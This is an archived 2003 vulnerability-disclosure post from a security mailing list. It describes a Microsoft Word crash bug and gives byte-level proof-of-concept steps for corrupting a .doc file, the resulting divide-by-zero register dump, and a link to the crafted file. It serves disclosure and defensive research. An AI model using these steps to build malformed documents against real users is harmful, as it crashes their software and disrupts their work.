Vulnerability Development mailing list archives
Bug in Microsoft Word
From: "Bahaa Naamneh" <b_naamneh () hotmail com>
Date: Fri, 03 Oct 2003 20:15:47 +0200
Bug in Microsoft Word Affected Systems: Microsoft Word 97, 98(J), 2000, 2002 Release Date: September 28, 2003 Technical Description: ============= The following steps can be performed in order to create a proof of concept Word document: 1. Open Word. 2. Save .doc file. 3. Modify .doc file by using binary editor as follows: these lines were taken from .doc file of Microsoft Word 2002(10.2627.3311): 00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 ------- 4. Change them as follows: 00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 62 62 62 62 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 ------- 5. Open modified .doc file. 6. Microsoft Word will crashes. Integer Divide by Zero: 30405E1E div eax,edi EAX = 62626262 EBX = 0091FDC0 ECX = 00008000 EDX = 00000000 ESI = 00000000 EDI = 00000000 EIP = 30405E1E ESP = 001263A8 EBP = 00126EE4 EFL = 00000246 div command will divide the eax by the edi If edi = 0 then anything/0 can't happen. * modified .doc file can be downloaded from: http://www12.brinkster.com/bsecurity/Doc1.doc Vendor status: ========= The vendor has been informed. Discovered by/Credit: ============= Bahaa Naamneh b_naamneh () hotmail com http://www.bsecurity.tk _________________________________________________________________Tired of spam? Get advanced junk mail protection with MSN 8. http://join.msn.com/?page=features/junkmail
Current thread:
- Bug in Microsoft Word Bahaa Naamneh (Oct 03)
- <Possible follow-ups>
- Re: Bug in Microsoft Word Pedro Jota Calvorota (Oct 08)
- RE: Bug in Microsoft Word Arjun Pednekar (Oct 09)
- Re: Bug in Microsoft Word Bahaa Naamneh (Oct 08)